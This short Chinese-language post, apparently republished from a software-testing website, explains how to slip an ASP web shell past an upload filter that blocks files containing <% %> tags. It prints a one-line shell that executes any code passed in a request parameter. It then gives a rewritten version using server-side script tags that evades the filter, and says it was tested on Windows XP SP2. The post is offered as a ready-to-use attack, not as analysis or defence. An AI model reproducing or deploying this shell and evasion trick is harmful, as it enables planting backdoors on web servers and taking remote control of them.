以前好多朋友說過就是在程序上傳shell過程中,程序不允許包含<%%>標記符號的內容的文件上傳,
這樣就有好多shell不能上傳上去了!那我們是不就沒別的方法了么,當然有了!呵呵!
我們拿藍屏最小的asp木馬來看下:
以下是引用片段:
<%execute request("l")%>
我們來把他的標簽換下來:
以下是引用片段:
<script language=VBScript runat=server>execute request("l")</Script>
呵呵!這樣就避開了使用<%%>,保存為.asp,程序照樣執行,效果一樣的說!
偶在xpsp2下測試成功!
延伸閱讀
文章來源于領測軟件測試網 http://www.kjueaiud.com/